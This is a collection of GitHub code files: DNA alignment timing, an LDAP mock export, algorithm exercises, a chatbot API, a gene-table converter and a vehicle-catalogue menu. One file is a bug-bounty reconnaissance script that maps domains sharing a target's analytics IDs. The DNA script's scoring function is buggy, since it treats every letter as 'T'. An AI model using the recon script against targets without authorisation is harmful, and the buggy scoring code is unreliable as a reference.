+{"seq_id":"866196713","text":"import time\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport numpy as np\n\n\nfileName = \"covid_DNA.fasta\"\n\ndef read_fasta(howMany = 2):\n # The first line in a FASTA record is the title line.\n # Examples:\n # >third sequence record\n # >gi|2765657|emb|Z78532.1|CCZ78532 C.californicum 5.8S rRNA gene\n # returns a list of sequences as tuples (name.)\n with open(fileName, 'r') as filePt:\n sequences = []\n fastas = filePt.read().split(\">\")\n fastas = fastas[1:]\n for i in range(0,howMany):\n seq = fastas[i].split(\"\\n\")\n seq_name = seq[0]\n fasta_seq = \"\".join(seq[1:])\n sequences.append((seq_name,fasta_seq))\n return sequences\n\n ##Calculates the time taken by each function call and generates graph\ndef timeProblems(DNAProblem, function, init=None, fit='exponential'):\n # problemList is a list of tuples [(size, arguments),...] ordered smallest to biggest\n # runs and times the function with each arguments a\n # generates a graph of run time as a function of problem size\n # fit may be 'exponential' then the time as a function of problem size is assumed\n # to of the form time = c * a^n and the function solves for c and a\n # where a is the base of the exponential function and c is a multiplicative factor\n # fit my be 'polynomial' then the time as a function of problem size is assumed\n # to of the form time = c * n ^ b and the function solves for c and b\n # where b is the power of n (the degree of the polynomial) and c is a multiplicative fac* tor\n timeLine = []\n values = []\n\n for (size, args) in DNAProblem:\n\n start_time = time.time()\n function(*args) # use the * to unpack the tuple into arguments to the function\n elapsed = (time.time() - start_time) * 1000.0\n if elapsed > 0.0:\n timeLine.append(elapsed)\n # print(elapsed)\n values.append(size)\n\n print(str(size) + \" Sequence Size complete\")\n ##Generating the plot between time taken by each function call with n as variable and n\n plt.plot(values, timeLine, 'g')\n plt.xlabel(\"Problem size\")\n plt.yscale('log')\n if fit == 'polynomial':\n plt.xscale('log')\n plt.ylabel(\"time in milliseconds\")\n plt.rcParams[\"figure.figsize\"] = [16, 9]\n plt.show()\n if fit == 'exponential': # fit a straight line to n and log time\n slope, intercept, _, _, _ = stats.linregress([values], [np.log(t) for t in timeLine])\n print(\"time = %.6f * %.3f ^ n\" % (np.exp(intercept), np.exp(slope)))\n elif fit == 'polynomial': # fit a straight line to log n and log time\n slope, intercept, _, _, _ = stats.linregress([np.log(v) for v in values], [np.log(t) for t in timeLine])\n print(\"time = %.6f * n ^ %.3f\" % (np.exp(intercept), slope))\n timems = (np.exp(intercept)) * (30000 ** slope)\n hours = (timems / 1000) / 60\n print(\"if n was 30,000 it would take : \" + str(timems) + \"milliseconds\")\n print(\"or \" + str(hours) + \" hours to run\")\n print(\"The time it takes to compute grows at a rate of n^2 because of\")\n print(\"the nested for loops in the matchDP. The 1st for loop is getting\")\n print(\"multiplied by itself in the 2nd for loop everytime the 2nd for loop iterates.\")\n print(\"side note, sometimes this program works and sometimes it doesn't, sometimes \")\n print(\"I can run the program with the sequences being 16,000 characters long, sometimes it\")\n print(\"crashes after 2000 character long sentences. I'm not sure if it is COLABS fault or\")\n print(\"if it is my code. COLAB tells me i ram out of RAM\")\n\nseq = read_fasta()\n(name0, seq0) = seq[0]\n(name1, seq1) = seq[1]\n\n\ndef matchR(A, B):\n # uses recursion to solve the string matching problem\n # mod the strings to put a blank in front so that n and m represent both\n # the number of characters in the string AND the index into the string\n n = len(A)\n m = len(B)\n A = '_' + A\n B = '_' + B\n return match(n, m, A, B, )\n\n\ndef match(n, m, A, B, depth=0):\n # one of the strings is empty\n # print(\"%s A = %s B= %s\" % (\" \" * depth, A[0:n], B[0:m]))\n if n == 0:\n sol = m\n elif m == 0:\n sol = n\n # three cases\n else:\n # print(matrixLookUp(A[n], B[m]))\n sol = max(match(n - 1, m, A, B, depth + 1) + matrixLookUp(\"_\", A[n]), # delete from A\n match(n, m - 1, A, B, depth + 1) + matrixLookUp(\"_\", B[m]), # delete from B\n match(n - 1, m - 1, A, B, depth + 1) + matrixLookUp(A[n], B[m])) # substitute (if 1 != 1 )\n # print(\"%s solution = %d\" % (\" \" * depth, sol))\n return sol\n\n\n# prints out the solution\ndef printAlign(A, B, cache):\n n = len(A)\n m = len(B)\n A = '_' + A\n B = '_' + B\n # alignment = traceback(n, m, A, B)\n alignment = traceBackDP(n, m, A, B, cache)\n alignment.reverse()\n for oneAlign in alignment:\n print(oneAlign)\n # print(\"____________________\")\n\n\ndef traceback(n, m, A, B):\n # n is in A, m is in B\n # base case\n # nothing to do, return empty\n if n == 0 and m == 0:\n print(cache[(n, m)])\n return []\n # no characters in A, so add a delete from A and continue\n if n == 0:\n # delete from A\n print(cache[(n, m)])\n return [\"%s - %s\" % ('_', B[m])] + traceback(n, m - 1, A, B)\n # no characters in B, so delete from B and continue\n if m == 0:\n # delete from B\n print(cache[(n, m)])\n return [\"%s - %s\" % (A[n], '_')] + traceback(n - 1, m, A, B)\n # Need to determine which alignment sub solution was used for the optimal solution\n sol = cache[(n, m)]\n # we know that sol must equal one of the sub solutions\n if sol == cache[(n - 1, m)] + matrixLookUp(\"_\", A[n]): # delete from B\n print(sol)\n return [\"%s - %s\" % (A[n], '_')] + traceback(n - 1, m, A, B)\n if sol == cache[(n, m - 1)] + matrixLookUp(\"_\", B[m]): # delete from A\n print(sol)\n return [\"%s - %s\" % ('_', B[m])] + traceback(n, m - 1, A, B)\n # must have matched the characters, check the characters\n if A[n] != B[m]: # substitution\n print(sol)\n return [\"%s x %s\" % (A[n], B[m])] + traceback(n - 1, m - 1, A, B)\n # exact match\n print(sol)\n return [\"%s = %s\" % (A[n], B[m])] + traceback(n - 1, m - 1, A, B)\n\n\ndef traceBackDP(n, m, A, B, cache):\n line = []\n # print(cache[(n,m)])\n\n while True:\n solution = cache[(n, m)]\n if n == 0 and m == 0:\n # print(\"n and m == 0\")\n # print(solution)\n return line\n\n elif n == 0:\n # line = line + [\"%s - %s\" % ('_', B[m])] #+ cache[(n, m-1)]\n # print(\"n==0\")\n m = m - 1\n # print(solution)\n\n\n elif m == 0:\n # line = line + [\"%s - %s\" % (A[n], '_')] #+ cache[(n-1, m)]\n print(\"m==0\")\n n = n - 1\n # print(solution)\n\n\n elif solution == cache[(n - 1, m)] + matrixLookUp(\"_\", A[n]): # delete from B\n # print(\"delete B\")\n line = line + [\"%s - %s\" % (A[n], '_')] # + cache[(n-1, m)]\n solution = cache[(n, m)]\n # print(solution)\n n = n - 1\n\n\n elif solution == cache[(n, m - 1)] + matrixLookUp(\"_\", B[n]): # delete from A\n # print(\"delete A\")\n line = line + [\"%s - %s\" % ('_', B[m])] # + cache[(n, m-1)]\n solution = cache[(n, m)]\n # print(solution)\n m = m - 1\n\n\n\n elif A[n] != B[m]: # substitution\n # print(\"doesnt equal\")\n line = line + [\"%s x %s\" % (A[n], B[m])] # + cache[(n-1, m-1)]\n solution = cache[(n, m)]\n # print(solution)\n n = n - 1\n m = m - 1\n\n\n elif A[n] == B[m]:\n # print(\"equals\")\n line = line + [\"%s = %s\" % (A[n], B[m])] # + cache[(n-1, m-1)]\n solution = cache[(n, m)]\n # print(solution)\n n = n - 1\n m = m - 1\n\n\n else:\n print(\"error\")\n n = n - 1\n m = m - 1\n print(\"traceback complete\")\n return line\n\n\ndef matchDP(A, B):\n global cache\n cache = {}\n X = A\n Y = B\n\n n = len(A)\n m = len(B)\n # modify the strings to put a blank in front\n A = '_' + A\n B = '_' + B\n # fill in the base cases\n for i in range(0, n + 1):\n cache[(0, i)] = i # matrixLookUp(\"_\",B[i])\n for j in range(0, m + 1):\n cache[(j, 0)] = j # matrixLookUp(\"_\", A[j])\n # loop though all problems from smallest to biggest\n # what about the 0 0 case?\n cache[(0, 0)] = 0\n for i in range(1, n + 1):\n for j in range(1, m + 1):\n # need to change the indexs into the array!\n # so from n in recursion to j and from m in recursion to i\n cache[(i, j)] = max(cache[(i - 1, j)] + matrixLookUp(\"_\", A[i - 1]),\n cache[(i, j - 1)] + matrixLookUp(\"_\", B[j - 1]),\n cache[(i - 1, j - 1)] + matrixLookUp(A[i - 1], B[j - 1]))\n return cache[(n, m)]\n\n\n# looks up the number associated with th eletters\ndef matrixLookUp(x, y):\n # if the letter being looked up isnt A,G,C,T\n # change it to T\n if x != \"A\" or \"G\" or \"C\" or \"T\":\n x = \"T\"\n if y != \"A\" or \"G\" or \"C\" or \"T\":\n y = \"T\"\n\n if x == \"A\" and y == \"A\":\n return 5\n if x == \"A\" and y == \"C\":\n return -1\n if x == \"A\" and y == \"G\":\n return -2\n if x == \"A\" and y == \"T\":\n return -1\n\n if x == \"C\" and y == \"A\":\n return -1\n if x == \"C\" and y == \"C\":\n return 5\n if x == \"C\" and y == \"G\":\n return -3\n if x == \"C\" and y == \"T\":\n return -2\n\n if x == \"G\" and y == \"A\":\n return -2\n if x == \"G\" and y == \"C\":\n return -3\n if x == \"G\" and y == \"G\":\n return 5\n if x == \"G\" and y == \"T\":\n return -2\n\n if x == \"T\" and y == \"A\":\n return -1\n if x == \"T\" and y == \"C\":\n return -2\n if x == \"T\" and y == \"G\":\n return -2\n if x == \"T\" and y == \"T\":\n return 5\n\n if x == \"_\" and y == \"A\":\n return -3\n if x == \"_\" and y == \"C\":\n return -4\n if x == \"_\" and y == \"G\":\n return -2\n if x == \"_\" and y == \"T\":\n return -1\n\n else:\n print(\"ERROR: \" + x + \" \" + y + \" other that provide letters found\")\n\n#TEST correctness of code\nA = 'ACGGAGAGAATC'\nB = 'TGGAGAGAATTC'\n\n\nA = 'GAA'\nB = 'GAC'\n\n\n#match to fill in the cache\n#edit = matchDP(A,B)\n#matchDP(A,B)\n#edit = matchR(A, B)\n#printAlign(A, B, cache)\n#print(edit)\n\ndef generateProblemsDNA(start, end):\n return [(i, (list1[:i], list2[:i])) for i in problemSizes]\n\n# TEST THE TIMING OF THE CODE\nglobal cache\ninputList = read_fasta(2)\n# size = 10000\nlist1 = seq0\nlist2 = seq1\nproblemSizes = [2**i for i in range(5, 14)]\nDNAProblem = [(i, (list1[:i], list2[:i])) for i in problemSizes]\n\n#since we expect the DP algorithm to be polynomial\ntimeProblems(DNAProblem, matchDP, fit = 'polynomial')\nprintAlign(list1[:16384], list2[:16384], cache)","repo_name":"BrodyLarsenUSU/DNAMatching","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17488720914","text":"\"\"\"\nexport_ldap.py\n\nUse this script to export the info from the LDAP server.\n\nMove the outputs of the script to the fixtures directory to run them with the ldap test suite.\n\nhttps://ldap3.readthedocs.io/mocking.html#a-complete-example\n\"\"\"\nimport json\n\nfrom ldap3 import ALL, ALL_ATTRIBUTES, MOCK_SYNC, Connection, Server\n\nINFO_OUTPUT = \"csua_ldap_info.json\"\nSCHEMA_OUTPUT = \"csua_ldap_schema.json\"\nENTRIES_OUTPUT = \"csua_ldap_entries.json\"\n\nif __name__ == \"__main__\":\n REAL_SERVER = \"ldaps://ldap.csua.berkeley.edu\"\n\n # Retrieve server info and schema from a real server\n server = Server(REAL_SERVER, get_info=ALL)\n connection = Connection(server, auto_bind=True)\n\n # Store server info and schema to json files\n server.info.to_file(INFO_OUTPUT)\n server.schema.to_file(SCHEMA_OUTPUT)\n\n # Read entries from a portion of the DIT from real server and store them in a json file\n if connection.search(\n \"dc=csua,dc=berkeley,dc=edu\", \"(objectclass=*)\", attributes=ALL_ATTRIBUTES\n ):\n raw_entries = connection.response_to_json(raw=True)\n entries = json.loads(raw_entries)\n filtered_entries = {\n \"entries\": [\n i\n for i in entries[\"entries\"]\n if \"posixAccount\" not in i[\"attributes\"][\"objectClass\"]\n # don't add the accounts\n ]\n }\n with open(ENTRIES_OUTPUT, \"w\") as f:\n json.dump(filtered_entries, f, indent=2)\n else:\n raise RuntimeError(\"ldap search failed!\")\n\n # Close the connection to the real server\n connection.unbind()\n\n # Create a fake server from the info and schema json files\n fake_server = Server.from_definition(\"csua_mock\", INFO_OUTPUT, SCHEMA_OUTPUT)\n\n # Create a MockSyncStrategy connection to the fake server\n fake_connection = Connection(fake_server, client_strategy=MOCK_SYNC)\n\n # Populate the DIT of the fake server\n fake_connection.strategy.entries_from_json(ENTRIES_OUTPUT)\n\n # Add a fake user for Simple binding\n fake_connection.strategy.add_entry(\n \"cn=django_test_user,ou=People,dc=csua,dc=berkeley,dc=edu\",\n {\"uid\": \"django_test_user\", \"userPassword\": \"P4SSW0RD!\"},\n )\n\n # Bind to the fake server\n fake_connection.bind()\n","repo_name":"CSUA/csua-backend","sub_path":"apps/ldap/export_ldap.py","file_name":"export_ldap.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"15961172138","text":"from Solution import Solution\n\ndef main():\n\n testInput = [3,4,5,1,2] # Output: 1\n testInput = [4,5,6,7,0,1,2] # Output: 0\n #testInput = [11,13,15,17] # Output: 11\n \n # instantiate Solution class\n solution = Solution()\n\n result = solution.findMin(testInput)\n\n print(f\"Minimum number in rotated, sorted array: {result}\")\n\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"tkinneen/leetcodeProblems","sub_path":"Problem_153_Find_Minimum_In_Rotated_Sorted_Array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10933545921","text":"import subprocess\nimport sys\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-s','--sample',nargs='?',help='Bucket26..36 or Prompt_data')\nparser.add_argument('-id','--ID', nargs='+',help='Cell ID', type=int)\nparser.add_argument('-e','--E',nargs='+',help='Min E and Max E',type=int)\nargs = parser.parse_args()\nSet_ID = set(args.ID)\n\nprint(f\"Data = {args.sample} CellID in {args.ID} {args.E[1]}>E>{args.E[0]}\")\nprint(f\"CellID = {args.ID}\")\n","repo_name":"karna5566/Code-Belle-II","sub_path":"Mogekokko/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"11788971379","text":"from graph import Graph,has_cycle\nfrom testing import *\nimport random\nimport matplotlib.pyplot as plt\n\n\ndef createRandomGraph(i,j):\n\n # if the number of edges is greater than the number of possible node connections (without duplicates) then we cannot create a list without duplicate edges\n # n Choose 2 max possible connections\n if j > (i * (i - 1)) // 2:\n raise ValueError(\"Too many edges for the given number of nodes\")\n\n graph = Graph(i)\n\n # generates a list of i nodes\n nodes = list(range(i))\n edge_count = 0\n\n while edge_count < j:\n node1 = random.choice(nodes)\n node2 = random.choice(nodes)\n\n # Skip current iteration if the same edge or duplicate edge is found\n if node1 == node2 or graph.are_connected(node1, node2):\n continue \n \n graph.add_edge(node1, node2)\n edge_count += 1\n\n return graph\n\n\n\n\n# number of each graph\n#numEdges = [500,1000,1500,2000,2500]\n\nnumEdges = [25,50,75,100,125,150,175,200]\ndef experiment1():\n \n numGraphs = 100\n cycleCounts = []\n\n for numEdge in numEdges:\n cycleCount = 0 \n\n\n for i in range(numGraphs):\n graph = createRandomGraph(100, numEdge)\n \n if(has_cycle(graph)):\n cycleCount += 1\n\n cycleCounts.append(cycleCount)\n \n print(cycleCounts)\n return cycleCounts \n\n\ncycleCounts = experiment1()\n\nplt.plot(numEdges,cycleCounts)\nplt.xlabel(\"number of Edges\")\nplt.ylabel(\"Cycle Probability (%)\")\nplt.title(\"Edges vs Cycle Probability (%)\")\nplt.show()\n\n\n\n\n","repo_name":"Mazen1004/3XB3Labs","sub_path":"Lab 2/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5479517191","text":"#!/usr/bin/env python\n\n\"\"\"\nRead a table dump in the UCSC gene table format and print a tab separated\nlist of intervals corresponding to requested features of each gene.\n\nusage: ucsc_gene_table_to_intervals.py [options] < gene_table.txt\n\noptions:\n -h, --help show this help message and exit\n -rREGION, --region=REGION\n Limit to region: one of coding, utr3, utr5, transcribed [default]\n -e, --exons Only print intervals overlapping an exon\n\"\"\"\n\nimport optparse\nimport string\nimport sys\n\n\ndef main():\n # Parse command line\n parser = optparse.OptionParser(usage=\"%prog [options] < gene_table.txt\")\n parser.add_option(\n \"-r\",\n \"--region\",\n dest=\"region\",\n default=\"transcribed\",\n help=\"Limit to region: one of coding, utr3, utr5, transcribed [default]\",\n )\n parser.add_option(\n \"-e\", \"--exons\", action=\"store_true\", dest=\"exons\", help=\"Only print intervals overlapping an exon\"\n )\n parser.add_option(\"-s\", \"--strand\", action=\"store_true\", dest=\"strand\", help=\"Print strand after interval\")\n parser.add_option(\n \"-b\",\n \"--nobin\",\n action=\"store_false\",\n dest=\"discard_first_column\",\n default=True,\n help=\"file doesn't contain a 'bin' column (use this for pre-hg18 files)\",\n )\n options, args = parser.parse_args()\n assert options.region in (\"coding\", \"utr3\", \"utr5\", \"transcribed\"), \"Invalid region argument\"\n\n # Read table from stdin and handle each gene\n for line in sys.stdin:\n # Parse fields from gene tabls\n fields = line.split(\"\\t\")\n if options.discard_first_column:\n fields.pop(0)\n chrom = fields[1]\n strand = fields[2]\n tx_start = int(fields[3])\n tx_end = int(fields[4])\n cds_start = int(fields[5])\n cds_end = int(fields[6])\n\n # Determine the subset of the transcribed region we are interested in\n if options.region == \"utr3\":\n if strand == \"-\":\n region_start, region_end = tx_start, cds_start\n else:\n region_start, region_end = cds_end, tx_end\n elif options.region == \"utr5\":\n if strand == \"-\":\n region_start, region_end = cds_end, tx_end\n else:\n region_start, region_end = tx_start, cds_start\n elif options.region == \"coding\":\n region_start, region_end = cds_start, cds_end\n else:\n region_start, region_end = tx_start, tx_end\n\n # If only interested in exons, print the portion of each exon overlapping\n # the region of interest, otherwise print the span of the region\n if options.exons:\n exon_starts = [int(_) for _ in fields[8].rstrip(\",\\n\").split(\",\")]\n exon_ends = [int(_) for _ in fields[9].rstrip(\",\\n\").split(\",\")]\n for start, end in zip(exon_starts, exon_ends):\n start = max(start, region_start)\n end = min(end, region_end)\n if start < end:\n if strand:\n print_tab_sep(chrom, start, end, strand)\n else:\n print_tab_sep(chrom, start, end)\n else:\n if strand:\n print_tab_sep(chrom, region_start, region_end, strand)\n else:\n print_tab_sep(chrom, region_start, region_end)\n\n\ndef print_tab_sep(*args):\n \"\"\"Print items in `l` to stdout separated by tabs\"\"\"\n print(string.join((str(f) for f in args), \"\\t\"))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bxlab/bx-python","sub_path":"scripts/ucsc_gene_table_to_intervals.py","file_name":"ucsc_gene_table_to_intervals.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":138,"dataset":"github-code","pt":"3"}
+{"seq_id":"26621168692","text":"from clases import *\n\nadmin=1\ninvitado=2\nprint (f\"\"\"\n{admin})Administracion.\n{invitado})Invitado.\n\"\"\")\nseleccion=int (input(\"SELECCIONE EL USUARIO QUE DESEA INGRESAR: \\n\"))\nif seleccion == admin:\n usuario=input(\"Ingrese el mail de administracion: \\n\")\n continuar=True\n print(\"Bienvenido al menu de Administración.\\n\")\n while usuario == \"lucaslopez@gmail.com\" and continuar:\n \n ver_catalogo=1\n agregar_vehiculo=2\n salir=3\n print(f\"\"\"\n !Seleccione la acción a realizar:\n {ver_catalogo})Ver Vehículos.\n {agregar_vehiculo})Cargar Vehiculo.\n {salir})Salir.\n \"\"\")\n accion=int(input(\": \\n\"))\n if accion == agregar_vehiculo:\n agregar_moto=1\n agregar_auto=2\n agregar_bicicleta=3\n print(f\"\"\"\n Seleccione el Vehículo que desea agregar.\n {agregar_moto})Motos.\n {agregar_auto})Autos.\n {agregar_bicicleta})Bicicletas.\n \"\"\")\n vehiculo=int(input(\": \\n\"))\n if vehiculo == agregar_moto:\n print(\"Ingrese los datos de la moto.\")\n marca_moto= input(\"Ingrese la marca: \\n\")\n modelo_moto=int(input(\"Ingrese el modelo: \\n\"))\n precio_moto=int(input(\"Ingrese el Precio: \\n\"))\n moto_nueva=Motos(marca_moto,modelo_moto,precio_moto)\n print(moto_nueva.marca,moto_nueva.modelo,moto_nueva.precio)\n elif vehiculo == agregar_auto:\n print(\"Ingrese los datos del auto.\")\n marca_auto=input(\"ingrese la marca: \\n\")\n modelo_auto=int(input(\"Ingrese el modelo: \\n\"))\n precio_auto=int(input(\"Ingrese el Precio: \\n\"))\n auto_nuevo=Auto(marca_auto,modelo_auto,precio_auto)\n print(auto_nuevo.marca,auto_nuevo.modelo,auto_nuevo.precio)\n elif vehiculo == agregar_bicicleta:\n print(\"Ingrese los datos de la bicicleta.\")\n marca_bicicleta=input(\"ingrese la marca: \\n\")\n rodado_bicicleta=int(input(\"Ingrese el rodado: \\n\"))\n precio_bicicleta=int(input(\"Ingrese el Precio: \\n\"))\n bicicleta_nueva=Bicicletas(marca_bicicleta,rodado_bicicleta,precio_bicicleta)\n print(bicicleta_nueva.marca,bicicleta_nueva.rodado,bicicleta_nueva.precio)\n elif accion==ver_catalogo:\n print (\"\\nCATÁLOGO DE MOTOS:\\n\")\n print(f\"Marca: {honda.marca}\\nModelo: {honda.modelo}\\nPrecio: {honda.precio}\\n\")\n print(f\"Marca: {motomel.marca}\\nModelo: {motomel.modelo}\\nPrecio: {motomel.precio}\\n\")\n print(f\"Marca: {moto_nueva.marca}\\nModelo: {moto_nueva.modelo}\\nPrecio: {moto_nueva.precio}\")\n print(\"\\nCATALOGO DE AUTOS:\\n\")\n print(f\"Marca: {vw.marca}\\nModelo: {vw.modelo}\\nPrecio: {vw.precio}\\n\")\n print(f\"Marca: {ford.marca}\\nModelo: {ford.modelo}\\nPrecio: {ford.precio}\\n\")\n print(f\"Marca: {auto_nuevo.marca}\\nModelo: {auto_nuevo.modelo}\\nPrecio: {auto_nuevo.precio}\")\n print(\"\\nCATALOGO DE BICICLETAS:\\n\")\n print(f\"Marca: {orbea.marca}\\nRodado: {orbea.rodado}\\nPrecio: {orbea.precio}\\n\")\n print(f\"Marca: {venzo.marca}\\nRodado: {venzo.rodado}\\nPrecio: {venzo.precio}\\n\")\n print(f\"Marca: {bicicleta_nueva.marca}\\nRodado: {bicicleta_nueva.rodado}\\nPrecio: {bicicleta_nueva.precio}\")\n elif accion==salir:\n print(\"Hasta la Próxima.\")\n continuar=False\n else:\n print(\"Opcion no valida\")\nelif seleccion == invitado:\n print (\"\\nCATÁLOGO DE MOTOS:\\n\")\n print(f\"Marca: {honda.marca}\\nModelo: {honda.modelo}\\nPrecio: {honda.precio}\\n\")\n print(f\"Marca: {motomel.marca}\\nModelo: {motomel.modelo}\\nPrecio: {motomel.precio}\\n\")\n print(\"\\nCATALOGO DE AUTOS:\\n\")\n print(f\"Marca: {vw.marca}\\nModelo: {vw.modelo}\\nPrecio: {vw.precio}\\n\")\n print(f\"Marca: {ford.marca}\\nModelo: {ford.modelo}\\nPrecio: {ford.precio}\\n\")\n print(\"\\nCATALOGO DE BICICLETAS:\\n\")\n print(f\"Marca: {orbea.marca}\\nRodado: {orbea.rodado}\\nPrecio: {orbea.precio}\\n\")\n print(f\"Marca: {venzo.marca}\\nRodado: {venzo.rodado}\\nPrecio: {venzo.precio}\\n\")\nelse:\n print(\"Usuario incorrecto.\")","repo_name":"LucasNLopez/Concesionaria","sub_path":"usuarios.py","file_name":"usuarios.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33178662320","text":"import openai\nfrom dotenv import load_dotenv\nfrom quart import Quart, request, jsonify\nimport semantic_kernel as sk\nimport semantic_kernel.connectors.ai.open_ai as sk_oai\nimport os\nfrom quart_cors import cors, route_cors\n\n\n\napp = Quart(__name__)\napp = cors(app, allow_origin=\"*\")\n# Load environment variables\nopenai.api_key = os.getenv('OPENAI_API_KEY')\norg_id = os.getenv('OPENAI_ORG_ID')\n@app.after_request\nasync def after_request(response):\n response = await route_cors(response, allow_origin=\"*\", allow_methods=[\"POST\"])\n return response\n# Setup from provided sample\nsystem_message = \"\"\"\nYou are a chat bot. Your name is Mosscap and\nyou have one goal: figure out what people need.\n\"\"\"\n\nkernel = sk.Kernel()\n#kernel.add_chat_service(\n# \"chat-gpt\", sk_oai.OpenAIChatCompletion(\"gpt-3.5-turbo\", openai.api_key,org_id)\n#)\nfrom semantic_kernel.connectors.ai.open_ai import AzureChatCompletion\n\n#deployment, api_key, endpoint = sk.azure_openai_settings_from_dot_env()\n\n\ndeployment = os.environ.get('AZURE_OPENAI_DEPLOYMENT_NAME')\napi_key = os.environ.get('AZURE_OPENAI_API_KEY')\nendpoint = os.environ.get('AZURE_OPENAI_ENDPOINT')\n\nkernel.add_chat_service(\"chat_completion\", AzureChatCompletion(deployment, endpoint, api_key))\n\nprompt_config = sk.PromptTemplateConfig.from_completion_parameters(\n max_tokens=6000, temperature=0.7, top_p=0.8\n)\nprompt_template = sk.ChatPromptTemplate(\n \"{{$user_input}}\", kernel.prompt_template_engine, prompt_config\n)\nprompt_template.add_system_message(system_message)\n\nfunction_config = sk.SemanticFunctionConfig(prompt_config, prompt_template)\nchat_function = kernel.register_semantic_function(\"ChatBot\", \"Chat\", function_config)\n\n# Refactored logic from the /engage route\nasync def engage_logic(user_input):\n # Set up context variables\n context_vars = sk.ContextVariables()\n context_vars[\"user_input\"] = user_input\n\n # Optionally initialize chat_history if needed\n context_vars[\"chat_history\"] = \"\"\n\n # Interact with Semantic Kernel\n answer = await kernel.run_async(chat_function, input_vars=context_vars)\n\n # Update chat_history for future interactions if needed\n context_vars[\"chat_history\"] += f\"\\nUser:> {user_input}\\nChatBot:> {answer}\\n\"\n\n # Convert the answer object to a string\n answer_text = str(answer)\n \n return answer_text\n\n@app.route('/engage', methods=['POST'])\nasync def engage():\n data = await request.get_json()\n user_input = data['user_input']\n\n # Call the refactored logic function\n answer_text = await engage_logic(user_input)\n\n return jsonify({\"response\": answer_text})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"passadis/learning-aid","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"13043988107","text":"import argparse\nimport requests\n\ndef get_analytics_codes(domain):\n # Hacer la request hacia la API\n response = requests.get(f\"https://api.hackertarget.com/analyticslookup/?q={domain}\")\n\n # Verificar si la request tuvo éxito\n if response.status_code != 200:\n print(\"Error al obtener los códigos de analytics\")\n return []\n\n # Procesar la respuesta y obtener los códigos\n lines = response.text.strip().split(\"\\n\")\n analytics_codes = [line.split(\",\")[1] for line in lines]\n\n return analytics_codes\n\ndef get_analytics_info(codes):\n results = []\n\n for code in codes:\n # Hacer la request hacia la API con cada código\n response = requests.get(f\"https://api.hackertarget.com/analyticslookup/?q={code}\")\n\n # Verificar si la request tuvo éxito\n if response.status_code != 200:\n print(f\"Error al obtener información de analytics para el código {code}\")\n continue\n\n # Procesar la respuesta y agregarla a la lista de resultados\n results.append(response.text.strip())\n\n return results\n\ndef main():\n # Crear el parser para los argumentos\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--domain\", required=True, help=\"Dominio a utilizar\")\n parser.add_argument(\"-o\", \"--output\", help=\"Archivo donde guardar la salida\")\n args = parser.parse_args()\n\n # Obtener el dominio y el archivo de salida del argumento\n domain = args.domain\n output_file = args.output\n\n codes = get_analytics_codes(domain)\n results = get_analytics_info(codes)\n\n # Guardar la salida en el archivo de salida o mostrarla en pantalla\n if output_file:\n with open(output_file, \"w\") as f:\n for result in results:\n f.write(result + \"\\n\")\n else:\n for result in results:\n print(result)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"A1ux/BugBountyResources","sub_path":"scripts/analytics_domains.py","file_name":"analytics_domains.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5517516225","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.contrib import admin\nfrom taskheat.utils.views import ExtraContextTemplateView\n\n\nadmin.autodiscover()\nurlpatterns = patterns('',\n url(r'^$',\n ExtraContextTemplateView.as_view(template_name='core/index.html',\n extra_context={\n 'page_name': 'Home'\n }),\n name='home'),\n url(r'^', include('taskheat.core.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^accounts/', include('django.contrib.auth.urls')),\n)\n","repo_name":"wraithan/taskheat","sub_path":"taskheat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"4168422041","text":"import random\n\nfrom faker import Faker\n\nfrom apiwrapper.endpoints.device_server import DeviceServer\nfrom tests.endpoints.test_endpoint import EndpointTest\n\n\nclass DeviceServerTest(EndpointTest):\n __base_endpoint_url = \"/device-server\"\n\n @property\n def _base_endpoint(self):\n return self.__base_endpoint_url\n\n def setUp(self):\n super().setUp(DeviceServer)\n self.faker = Faker()\n\n def test_get_base_endpoint(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check = self.test_class._get_base_endpoint()\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_get_all_device_servers(self):\n endpoint_should_be = self._base_endpoint\n\n endpoint_to_check = self.test_class.get_all_device_servers()\n\n self.assert_parameters(endpoint_should_be, endpoint_to_check)\n\n def test_get_device_server_by_id(self):\n endpoint_should_be = self._base_endpoint\n endpoint_should_be += \"/%d\" % self.random_id\n\n endpoint_to_check = self.test_class.get_device_server_by_id(\n self.random_id)\n\n 